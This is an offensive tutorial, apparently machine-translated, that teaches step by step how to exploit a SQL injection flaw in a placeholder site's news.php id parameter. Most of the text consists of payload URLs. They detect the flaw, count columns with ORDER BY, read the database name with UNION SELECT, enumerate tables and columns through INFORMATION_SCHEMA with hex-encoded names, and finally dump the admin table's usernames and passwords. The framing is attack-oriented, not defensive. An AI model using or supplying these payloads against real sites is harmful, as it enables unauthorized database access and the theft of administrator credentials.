Let our target site be xx.com, let's first check if there is a SQL injection vulnerability on our site,
xx.com/news.php?id=5
Let's say the content of the page contains a Topic titled News-1
xx.com/news.php?id=6
Let's say the content of the page contains a topic titled News-2.
xx.com/news.php?id=6-1
When we do this and log in to the site, if our topic titled News-1 appears, it means that our site is suitable for SQL injection vulnerability, this process performs the extraction process in the SQL query. If a site has SQL Injection Security, a topic titled News-2 should appear.
The First Method May Not Work Sometimes, The Second Method Is To Put Quotation Signs ( ' ) At The End Of The Query And See The SQL Injection Error On The Screen, Admins Of Some Websites Hide The Error Messages By Putting Error_reporting(0) To Close It. So Is It Any Obstacle? No. If You Enter the Parameters Correctly, You Can Successfully Perform Your SQL Injection Operations.
xx.com/news.php?id=5'
Now Let's Learn Our Column Number. What is This Column Number?
For example, there is a table called news in the database. This table has only 7 columns. Here we will try to find the number of columns (7).
xx.com/news.php?id=5'+order+by+1+--+-
We enter our website with the parameter. The content of the page will not change. We try by increasing the number 1 one by one until we see that the page gives an error or a blank page appears.
xx.com/news.php?id=5'+order+by+8+--+-
We saw that our page gave an error. This means that our column number is 7. Now let's print our column numbers on the screen.
xx.com/news.php?id=5'+and false+UNION+ALL+SELECT+1,2,3,4,5,6,7+--+-
There will be column numbers in the content of our page, 3,5,7. We will choose one of them and get our database name.
xx.com/news.php?id=5'+and false+UNION+ALL+SELECT+1,2,3,database(),5,6,7+--+-
I chose the number 4 and deleted the number 4 from the parameter section and wrote database(). In the content of the page, we removed the name of the database where the number 4 was written. I give an example. Our database name is illegalplatform_whiz.
We Go to Online Hex Encoder Sites and Encode Our Database Name as Hex,
illegalplatform_whiz = 696C6C6567616C706C6174666F726D5F7768697A
Now Let's Take Our Paintings
xx.com/news.php?id=5'+and false+UNION+ALL+SELECT+1,2,3,(SELECT+GROUP_CONCAT( table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_ SCHEMA.TABLES+WHERE+TABLE_SCHEMA =0x696C6C6567616C706C6174666F726D5F7768697A),5,6,7+--+-
The Area I Marked in Green is the Database Name We Encoded, The Area I Marked in Yellow is the Parameter I Added Later, and the Tables of the Database Appeared in the Content of Our Page. For example, the resulting tables are admin, news, users. Now we draw the column names of the admin table and encode the admin name again in Hex.
admin = 61646D696E
xx.com/news.php?id=5'+and false+UNION+ALL+SELECT+1,2,3,(SELECT+GROUP_CONCAT( column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION _SCHEMA.COLUMNS+WHERE+TABLE_NAME =0x61646d696e),5,6,7+--+-
Likewise, the Parameter I added later, which I marked with Yellow, is the hex encode version of the name admin, which I marked with Green. Column names of the admin table will appear in the content of the page, I give examples such as id, username, password. Now let's draw the content of the columns.
xx.com/news.php?id=5'+and false+UNION+ALL+SELECT+1,2,3,(SELECT+GROUP_CONCAT(id,username,password+SEPARATOR+0x3c62723e)+FROM+illegalplatform_whiz.admin) ,5,6,7+--+-
The field I marked in yellow will be the column names of the admin table, the field I marked in green will be the database name, the field I marked in orange will be the table name, and the id, Username and Password information as 1adminadmin will appear in the content of our page.
